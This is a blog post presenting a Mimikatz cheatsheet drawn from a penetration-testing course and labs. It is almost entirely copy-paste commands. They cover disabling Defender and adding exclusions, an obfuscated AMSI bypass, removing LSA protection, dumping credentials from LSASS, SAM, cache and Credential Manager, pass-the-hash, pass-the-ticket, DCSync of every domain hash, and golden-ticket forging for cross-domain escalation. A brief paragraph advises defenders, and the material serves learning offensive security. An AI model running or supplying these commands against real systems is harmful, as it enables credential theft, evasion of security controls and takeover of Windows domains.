Mimikatz Cheatsheet

Rich
5 min readAug 26, 2022

--

TL;DR Mimikatz cheatsheet of things I have found useful in CRTP and the lab.

Welcome to Part I of our cheatsheet series compiled from various courses, labs, stuff we did at work, Google, etc. Most of this was spread out over various howtos. This puts it all in one place. These are cheatsheets, almost no explanation is given, just commands. The links are to howtos that provide background.

Part I: Mimikatz cheatsheet

Part II: Set-Acl cheatsheet

Part III: Get-Acl cheatsheet

Part IV: Enumerating AD cheatsheet

Part V: Windows reverse shells cheatsheet

Part VI: MS Graph PowerShell cheatsheet

Part VII: Hash cracking cheatsheet

Part VIII: The Credential Theft Shuffle

Part IX: SACLs & Querying Collected Logs

Part X: Setting up a simple AD lab in Azure

Background

Yes, this info is out there already, most notably Sean Metcalf’s Guide to Mimikatz. This is just my personal cheatsheet for Mimikatz compiled from my notes taken during various labs, the CRTP course, etc.

Please note that I was using Invoke-Mimikatz.ps1 most of the time, therefore my cheatsheet is heavy on commands in that syntax. Generally speaking, if you’re using the *.exe then just run what is inside the quotes. I am also partial to PowerShell_ISE.

Please note that you can run multiple commands with Invoke-Mimikatz.ps1 by simply enclosing the entire thing in single quotes and each command in double quotes. Example:

Invoke-Mimikatz -Command ‘”token::elevate” “privilege::debug” “sekurlsa::msv”’

Please note that Medium often mangles quotations, even in codeblocks. If you copy/paste a command and get an error then re-type the quotes in the CLI.

Running Mimikatz at all

Defender will block an unaltered copy of Mimikatz. Please do NOT rely on this alone in the workplace. Mimikatz is open source and freely available, therefore a dedicated attacker will simply modify it enough to not trip Defender. These researchers did it just to prove a point. Therefore focus on denying an attacker the rights needed to dump credentials. Failing that, focus on basic security hygiene so there isn’t anything usable in the dump.

With that disclaimer out of the way, here is how I have used Mimikatz in labs, CRTP, etc.

Launch PowerShell as admin, add a folder exception to Defender, turn off real time monitoring:

Start-Process PowerShell_ISE -Verb RunASAdd-MpPreference -ExclusionPath “C:\Temp”Set-MpPreference -DisableRealTimeMonitoring $trueImport-Module C:\Temp\Invoke-Mimikatz.ps1

Alternatively you can often get away with just running the AMSI bypass if you can’t turn off Defender. I have used this tactic with PowerView and PowerUp in the past:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Bypassing LSA protection

Additionally, if Mimkatz has an issue with LSA protection this can be disabled by the local admin. If this issue occurs you will likely see something along the lines of

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

This protection can be disabled by loading a Mimikatz driver, and credentials can then be dumped.

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

Dumping creds with Mimikatz:

This is normally required first if running Mimikatz locally:

Invoke-Mimikatz -Command ‘“token::elevate”’Invoke-Mimikatz -Command ‘“privilege::debug”’Invoke-Mimikatz -Command ‘“sekurlsa::logonpasswords”’

Please note that ‘logonpasswords’ lists everything except Credential Manager, as I found out once.

List the sekurlsa commands:

“sekurlsa::help”

Check Credential Manager for things like saved RDP passwords:

Invoke-Mimikatz -Command ‘“token::elevate” “vault::cred /patch”’Invoke-Mimikatz -Command '"sekurlsa::credman"'

If you are using mimikatz.exe:

Start-Process C:\Temp\mimikatz_trunk\x64\mimikatz.exe -Verb RunAstoken::elevateprivilege::debugsekurlsa::msv

Other useful things to dump:

vault::cred #dump Credential Manager

lsadump::sam #dump the SAM

lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)

Pass-The-Hash (PTH) with Mimikatz

Explanation, lab demo, and mitigations are here.

PTH and launch PowerShell_ISE as that user:

Invoke-Mimikatz -Command ‘“sekurlsa::pth /user:administrator /domain:corp /ntlm:03df526c49c8684ebed22fdb3ec5c533 /run:PowerShell_ISE”’

Pass-The-Ticket (PTT) with Mimikatz

Explanation, lab demo, and mitigations are here.

Export & list tickets:

$sess = New-PSSession -ComputerName TestIPAMInvoke-Command -ScriptBlock {Set-MpPreference –DisableRealTimeMonitoring $true} -ComputerName TestIPAMInvoke-Command -FilePath C:\Temp\Invoke-Mimikatz.ps1 -Session $sessEnter-PSSession $sessmkdir etccd .\etcInvoke-Mimikatz -Command ‘“sekurlsa::tickets /export”’

Copy/paste the name of the ticket to elevate with, then:

Invoke-Mimikatz -Command ‘“kerberos::ptt .\<ticket filename>”’

Confirm privileges:

Invoke-Command -ScriptBlock {hostname;whoami} -ComputerName TestDC

Show tickets currently in use:

klist

If you are having issues or getting weird errors, purge tickets and try again:

klist purge

Dump creds remotely with Mimikatz

This only requires that you are running as a Domain User who has local admin rights on the remote system.

Invoke-Command –ScriptBlock {Set-MpPreference –DisableRealTimeMonitoring $true} –ComputerName DCInvoke-Mimikatz -DumpCreds -ComputerName DC

DCSync

Explanation & lab demo here.

Grab the krbtgt NTLM

Invoke-Mimikatz -Command ‘”lsadump::dcsync /user:corp\krbtgt”’

Forge a Golden Ticket using krbtgt hash & domain SID:

Invoke-Mimikatz -Command ‘”kerberos::golden /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ptt”’

Alternatively, save the ticket for future use:

kerberos::golden /domain:corp.local /sid:S-1–5–21–1917967189–4054103991–136247481 /krbtgt:cb542d2484aae7b5156c9a1a7bbb31e7 /user:Administrator /id:500 /ticket:forged.kirbikerberos::ptt forged.kirbimisc::cmd

Dump every hash in the domain into a file for use later:

Invoke-Mimikatz -Command ‘“token::elevate” “privilege::debug” “lsadump::dcsync /dc:BackupDC4 /domain:test.local /all /csv”’ | Export-Csv .\AllHashes.csv

Forge a ticket to use in a trusting domain

In this case we have compromised a child domain and want to escalate to the parent domain. There is a trust relationship between them.

Invoke-Mimikatz -Command ‘“kerberos::golden /user:Administrator /domain:<child domain FQDN> /sid:<child domain SID> /sids:<parent domain SID>-519 /krbtgt:<child domain krbtgt NTLM> /ticket:C:\AD\Tools\krbtgt_tkt.kirbi”’

Load the ticket and start using privs in the parent domain:

Invoke-Mimikatz -Command ‘“kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi”’

References

Benjamin Delpy’s github with Mimikatz: https://github.com/ParrotSec/mimikatz

Sean Metcalf’s guide to Mimikatz: https://adsecurity.org/?page_id=1821

Microsoft Docs on klist: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist

--

--

Rich
Rich

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.

No responses yet